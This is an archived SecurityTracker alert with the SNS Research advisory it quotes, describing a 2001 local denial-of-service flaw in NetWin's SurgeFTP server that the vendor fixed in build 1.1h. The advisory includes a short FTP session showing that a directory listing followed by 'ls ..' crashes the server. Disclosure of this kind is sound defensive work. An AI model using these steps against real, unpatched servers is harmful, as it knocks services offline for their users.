SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (File Transfer/Sharing)  >   SurgeFTP Vendors:   NetWin
Users Can Crash NetWin's SurgeFTP Server Via Local Access
SecurityTracker Alert ID:  1000984
SecurityTracker URL:  http://securitytracker.com/id/1000984
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 4 2001
Impact:   Denial of service via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 1.1h
Description:   A local denial of service condition exists in NetWin's SurgeFTP server that allows local users to crash the server.

SNS Research reports that a design issue in the SurgeFTP server creates a potential denial of service condition in which any user with local access to the host could crash the server. The problem is in the local handling of the directory listing command, which will crash if a valid request is followed by a "malformed" request.

Impact:   A local user could cause the ftp server to crash.
Solution:   Vendor has apparently released build v1.1h to correct the vulnerability. See ftp://ftp.netwinsite.com/pub/surgeftp/
Vendor URL:  www.netwinsite.com (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  SurgeFTP Denial of Service


Strumpf Noir Society Advisories
! Public release !
<--#


-= SurgeFTP Denial of Service =-

Release date: Thursday, March 1, 2001


Introduction:

NetWin's SurgeFTP is an easy to manage and reliable FTP server with
detailed reporting and easy to use management features.

SurgeFTP is available for both the Unix/Linux and Windows flavours of
operating systems from the vendor's site: http://www.netwinsite.com


Problem:

Due to a design issue in the SurgeFTP server a denial of service
condition exists in it which could allow any user with local or shell
access to the host to crash the server. The problem resides in the
local handling of the directory listing command, which after first being
successfully initialized will die if followed by a "malformed" request.


Example:

# ftp localhost

Connected to testbak

220 SurgeFTP testbak (Version 1.0b)

User (testbak:(none)): anonymous

331 Password required for anonymous.

Password:

230- Alias      Real path       Access

230- /          /home           read

230 User anonymous logged in.

ftp> ls /

200 Port command successful.

150 Opening ASCII mode data connection for file list. (/)

226 Transfer complete.

ftp> ls ..

200 Port command successful.

150 Opening ASCII mode data connection for file list. (/..)

-> ftp get:Connection reset by peer


(..)


Solution:

Vendor has been notified and has verified the problem. Build v1.1h has
been released, which fixes this issue. It's available from
ftp://ftp.netwinsite.com/pub/surgeftp/


yadayadayada

Free sk8! (http://www.freesk8.org)

SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html)
compliant, all information is provided on AS IS basis.

EOF, but Strumpf Noir Society will return!

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2017, SecurityGlobal.net LLC